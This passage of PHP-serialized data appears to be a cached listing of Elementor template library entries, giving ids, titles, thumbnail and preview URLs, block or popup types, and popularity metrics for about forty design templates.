6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1-1.png\";s:12:\"tmpl_created\";s:10:\"1520443641\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-6-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"91\";s:11:\"trend_index\";s:2:\"58\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:48;a:14:{s:2:\"id\";s:5:\"10467\";s:5:\"title\";s:27:\"Bottom Bar | Contact | Lego\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/tro_small.png\";s:12:\"tmpl_created\";s:10:\"1547962277\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/bottom-bar-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"565\";s:11:\"trend_index\";s:3:\"591\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:49;a:14:{s:2:\"id\";s:4:\"6044\";s:5:\"title\";s:11:\"Features 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443643\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"76\";s:11:\"trend_index\";s:2:\"48\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:50;a:14:{s:2:\"id\";s:4:\"6053\";s:5:\"title\";s:10:\"Features 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_5.png\";s:12:\"tmpl_created\";s:10:\"1520443645\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"172\";s:11:\"trend_index\";s:3:\"136\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:51;a:14:{s:2:\"id\";s:5:\"10487\";s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/acc_small.png\";s:12:\"tmpl_created\";s:10:\"1547964527\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"496\";s:11:\"trend_index\";s:3:\"391\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:52;a:14:{s:2:\"id\";s:4:\"6063\";s:5:\"title\";s:7:\"Stats 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443647\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"156\";s:11:\"trend_index\";s:3:\"170\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:53;a:14:{s:2:\"id\";s:5:\"10498\";s:5:\"title\";s:14:\"Classic | Sale\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/pink_small-1.png\";s:12:\"tmpl_created\";s:10:\"1547964616\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"437\";s:11:\"trend_index\";s:3:\"396\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:54;a:14:{s:2:\"id\";s:4:\"6071\";s:5:\"title\";s:8:\"Stats 13\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443649\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"158\";s:11:\"trend_index\";s:3:\"159\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:55;a:14:{s:2:\"id\";s:4:\"6079\";s:5:\"title\";s:7:\"Stats 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_4.png\";s:12:\"tmpl_created\";s:10:\"1520443651\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"264\";s:11:\"trend_index\";s:3:\"321\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:56;a:14:{s:2:\"id\";s:5:\"10519\";s:5:\"title\";s:27:\"Hello Bar | Promotion | App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/app_small-1.png\";s:12:\"tmpl_created\";s:10:\"1547964801\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/hello-bar-promotion-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"514\";s:11:\"trend_index\";s:3:\"499\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:57;a:14:{s:2:\"id\";s:4:\"6089\";s:5:\"title\";s:7:\"Stats 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443653\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"182\";s:11:\"trend_index\";s:3:\"182\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:58;a:14:{s:2:\"id\";s:4:\"6097\";s:5:\"title\";s:7:\"Stats 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443655\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"261\";s:11:\"trend_index\";s:3:\"258\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:59;a:14:{s:2:\"id\";s:4:\"6106\";s:5:\"title\";s:7:\"Stats 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520443657\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"325\";s:11:\"trend_index\";s:3:\"337\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:60;a:14:{s:2:\"id\";s:4:\"6114\";s:5:\"title\";s:7:\"Stats 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_6.png\";s:12:\"tmpl_created\";s:10:\"1520443659\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"357\";s:11:\"trend_index\";s:3:\"481\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:61;a:14:{s:2:\"id\";s:4:\"6122\";s:5:\"title\";s:7:\"About 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2-1.png\";s:12:\"tmpl_created\";s:10:\"1520443661\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"41\";s:11:\"trend_index\";s:2:\"24\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:62;a:14:{s:2:\"id\";s:5:\"10569\";s:5:\"title\";s:15:\"Slide In | Sale\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/off_small.png\";s:12:\"tmpl_created\";s:10:\"1547967812\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/popups/slide-in-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"472\";s:11:\"trend_index\";s:3:\"451\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:63;a:14:{s:2:\"id\";s:4:\"6135\";s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443663\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"85\";s:11:\"trend_index\";s:2:\"72\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:64;a:14:{s:2:\"id\";s:4:\"6144\";s:5:\"title\";s:7:\"Team 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_11.png\";s:12:\"tmpl_created\";s:10:\"1520443664\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"148\";s:11:\"trend_index\";s:3:\"127\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:65;a:14:{s:2:\"id\";s:5:\"10590\";s:5:\"title\";s:19:\"Full Screen | Login\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/pass1_small.png\";s:12:\"tmpl_created\";s:10:\"1547967978\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"465\";s:11:\"trend_index\";s:3:\"511\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:66;a:14:{s:2:\"id\";s:4:\"6152\";s:5:\"title\";s:7:\"Stats 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443666\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"238\";s:11:\"trend_index\";s:3:\"230\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:67;a:14:{s:2:\"id\";s:5:\"10600\";s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/orange_small.png\";s:12:\"tmpl_created\";s:10:\"1547968080\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"462\";s:11:\"trend_index\";s:3:\"388\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:68;a:14:{s:2:\"id\";s:4:\"6162\";s:5:\"title\";s:11:\"Services 31\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443668\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-31/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"323\";s:11:\"trend_index\";s:3:\"403\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:69;a:14:{s:2:\"id\";s:4:\"6170\";s:5:\"title\";s:8:\"Stats 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443670\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"320\";s:11:\"trend_index\";s:3:\"344\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:70;a:14:{s:2:\"id\";s:5:\"10622\";s:5:\"title\";s:34:\"Full Screen | Contact | Headphones\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/full_hear_small.png\";s:12:\"tmpl_created\";s:10:\"1547969678\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/full-screen-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"475\";s:11:\"trend_index\";s:3:\"427\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:71;a:14:{s:2:\"id\";s:4:\"6178\";s:5:\"title\";s:8:\"Stats 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443676\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"362\";s:11:\"trend_index\";s:3:\"438\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:72;a:14:{s:2:\"id\";s:5:\"10633\";s:5:\"title\";s:23:\"Slide In | Login | Lego\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/tro_small-1.png\";s:12:\"tmpl_created\";s:10:\"1547969858\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/slide-in-login/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"546\";s:11:\"trend_index\";s:3:\"569\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:73;a:14:{s:2:\"id\";s:4:\"6186\";s:5:\"title\";s:8:\"Stats 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443678\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"419\";s:11:\"trend_index\";s:3:\"418\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:74;a:14:{s:2:\"id\";s:5:\"10644\";s:5:\"title\";s:26:\"Fly In | Contact | Webinar\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/blue_small-1.png\";s:12:\"tmpl_created\";s:10:\"1547970814\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/fly-in-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"442\";s:11:\"trend_index\";s:3:\"389\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:75;a:14:{s:2:\"id\";s:4:\"6196\";s:5:\"title\";s:10:\"Features 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520443680\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"107\";s:11:\"trend_index\";s:2:\"97\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:76;a:14:{s:2:\"id\";s:5:\"10654\";s:5:\"title\";s:31:\"Full Screen | Login | Christmas\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/full_login_small.png\";s:12:\"tmpl_created\";s:10:\"1547970917\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/full-screen-login-christmas/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"530\";s:11:\"trend_index\";s:3:\"544\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:77;a:14:{s:2:\"id\";s:4:\"6204\";s:5:\"title\";s:10:\"Features 8\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_6.png\";s:12:\"tmpl_created\";s:10:\"1520443681\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"215\";s:11:\"trend_index\";s:3:\"216\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:78;a:14:{s:2:\"id\";s:5:\"10664\";s:5:\"title\";s:34:\"Slide In | Contact | Gym | Fitness\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/slide_gym_small.png\";s:12:\"tmpl_created\";s:10:\"1547973928\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"471\";s:11:\"trend_index\";s:3:\"383\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:79;a:14:{s:2:\"id\";s:4:\"6212\";s:5:\"title\";s:11:\"Features 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_7.png\";s:12:\"tmpl_created\";s:10:\"1520443684\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"81\";s:11:\"trend_index\";s:2:\"73\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:80;a:14:{s:2:\"id\";s:5:\"10675\";s:5:\"title\";s:35:\"Full Screen | Login | Gym | Fitness\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/01/gym_full_small.png\";s:12:\"tmpl_created\";s:10:\"1547974110\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-login-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"469\";s:11:\"trend_index\";s:3:\"469\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:81;a:14:{s:2:\"id\";s:4:\"6220\";s:5:\"title\";s:10:\"Features 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_8.png\";s:12:\"tmpl_created\";s:10:\"1520443685\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"84\";s:11:\"trend_index\";s:2:\"64\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:82;a:14:{s:2:\"id\";s:4:\"6230\";s:5:\"title\";s:6:\"Hero 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443687\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"364\";s:11:\"trend_index\";s:3:\"421\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:83;a:14:{s:2:\"id\";s:4:\"9719\";s:5:\"title\";s:30:\"Classic | Subscribe | Register\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/01/register_small.png\";s:12:\"tmpl_created\";s:10:\"1547976107\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/classic-subscribe-register/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"430\";s:11:\"trend_index\";s:3:\"318\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:84;a:14:{s:2:\"id\";s:4:\"6239\";s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443689\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"28\";s:11:\"trend_index\";s:2:\"20\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:85;a:14:{s:2:\"id\";s:4:\"6249\";s:5:\"title\";s:6:\"Hero 